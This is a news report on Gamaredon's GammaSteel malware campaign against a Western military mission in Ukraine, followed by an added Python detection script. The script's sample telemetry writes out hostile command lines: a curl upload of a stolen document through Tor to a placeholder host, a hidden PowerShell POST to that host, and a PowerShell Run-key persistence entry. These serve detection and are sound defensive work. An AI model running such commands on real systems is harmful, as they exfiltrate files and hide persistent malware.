Russian state-backed cyber group Gamaredon has launched a wave of attacks against a Western military mission operating in Ukraine, according to a recent report. The campaign, which began in February 2025 and lasted through March, relied on removable drives to infect systems with an updated version of its data-stealing malware known as GammaSteel.
Investigators believe that Gamaredon gained initial access to targeted systems using malicious LNK shortcut files placed on USB drives.
Once the infected drive was inserted into a computer, the shortcut triggered a heavily obfuscated script. This script ran two main components: one handled command and control communication by connecting to servers using legitimate services such as Cloudflare, and the other enabled the malware to spread to other removable and network drives by dropping more LNK files and hiding important system folders to mask the infection.
Researchers noticed a change in tactics from the hacking group. Gamaredon appears to have moved away from traditional VBS scripts in favour of PowerShell-based tools, which offer more flexibility and easier evasion of detection. The group has also begun using legitimate system utilities like ‘certutil.exe’ to hash stolen files and relies on PowerShell web requests for data exfiltration. If those attempts fail, the malware falls back on using cURL over the Tor network to transmit stolen documents.
The final payload used in the campaign is a stealthy PowerShell version of GammaSteel that resides in the Windows Registry. It can collect a wide range of file types such as DOC, PDF, XLS, and TXT from locations like the Desktop, Documents, and Downloads folders. The malware also gathers screenshots and system information, including installed antivirus software and running processes.
To ensure persistence, Gamaredon adds a key to the Windows Run registry path, allowing the malware to execute every time the infected system starts up. Despite being considered less sophisticated than other Russian state-sponsored groups, Gamaredon has continued to improve its methods, making it a growing concern for Western defence networks.
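The behaviours described above (certutil hashing, PowerShell web requests, cURL over Tor, a PowerShell payload launched from a Run key) map directly onto process-creation and registry telemetry. The check below is an added example written from the defender's side; it is not code from the report or its authors. The command-line patterns, the rule names and the sample events are assumptions, since the report quotes no command lines; the Tor SOCKS port 9050 is Tor's documented default.

```python
import re

# Each rule: (name, process image it applies to, regex over the command line).
# Behaviours come from the report; the exact strings are assumptions.
RULES = [
    ("certutil_hashfile", "certutil.exe", re.compile(r"-hashfile\b", re.I)),
    ("powershell_web_request", "powershell.exe",
     re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|\biwr\b|\birm\b", re.I)),
    ("curl_via_tor_socks", "curl.exe",  # Tor's default SOCKS listener is 127.0.0.1:9050
     re.compile(r"--(?:proxy|socks5(?:-hostname)?)[ =]\S*127\.0\.0\.1:9050", re.I)),
    ("powershell_registry_payload", "powershell.exe",  # script body read from a registry value
     re.compile(r"Get-ItemProperty.*(?:\bIEX\b|Invoke-Expression)", re.I | re.S)),
]
RUN_KEY_SUFFIX = r"\currentversion\run"

def classify_process(image, cmdline):
    """Return the names of every rule this process-creation event matches."""
    name = image.rsplit("\\", 1)[-1].lower()
    return [r for r, img, pat in RULES if name == img and pat.search(cmdline)]

def classify_registry(key, data):
    """Flag a Run-key value whose data launches PowerShell (the persistence described)."""
    if key.lower().rstrip("\\").endswith(RUN_KEY_SUFFIX) and "powershell" in data.lower():
        return ["run_key_powershell_persistence"]
    return []

def scan(events):
    """Group matching events by rule name; events with no hit are dropped."""
    hits = {}
    for ev in events:
        if ev["type"] == "process":
            found = classify_process(ev["image"], ev["cmdline"])
        else:
            found = classify_registry(ev["key"], ev["data"])
        for rule in found:
            hits.setdefault(rule, []).append(ev)
    return hits

# Constructed sample telemetry (not from the report); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil.exe -hashfile "C:\Users\u\Documents\plan.docx" MD5'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest -Uri https://c2.example -Method POST"'},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe --socks5-hostname 127.0.0.1:9050 -F f=@plan.docx http://c2.example/u"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": "powershell.exe -w hidden -c <script>"},
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -store my"},  # ordinary certutil use: must not match
]
```

Running `scan(SAMPLE_EVENTS)` yields one event under each of the four rules the constructed telemetry exercises; the benign certutil invocation produces no hit.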
Researchers warn that Gamaredon’s increased use of obfuscation, combined with its consistent targeting of military organisations, underscores the ongoing threat it poses, especially given the group’s persistence and evolving techniques.
